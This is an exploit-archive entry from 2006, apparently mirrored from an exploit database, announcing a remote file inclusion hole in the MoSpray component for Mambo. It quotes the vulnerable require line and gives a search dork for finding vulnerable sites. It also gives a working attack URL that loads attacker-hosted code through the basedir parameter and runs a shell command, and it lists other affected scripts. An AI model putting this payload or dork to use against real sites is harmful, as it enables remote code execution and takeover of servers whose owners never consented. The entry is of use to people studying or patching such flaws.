[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MoSpray Mambo Component <= 18RC1 Remote Include Vulnerability
# Published : 2006-07-23
# Author : Kurdish Security
# Previous Title : PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
# Next Title : ArticlesOne <= 07232006 (page) Remote Include Vulnerability
>>> Kurdish Security
>>> MoSpray Remote File Include Vulnerability
>>> Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : MoSpray
>>> Site : http://www.caneblu.com
>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends
codes
require("$basedir/components/com_mospray/lang/$lang/admin.php");
d0rkiz : allinurl:"com_mospray"
http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?&cmd=id
Used link :]
admin.php
details.php
modify.php
newgroup.php
newtask.php
rss.php
e0f
# www.Syue.com [2006-07-23]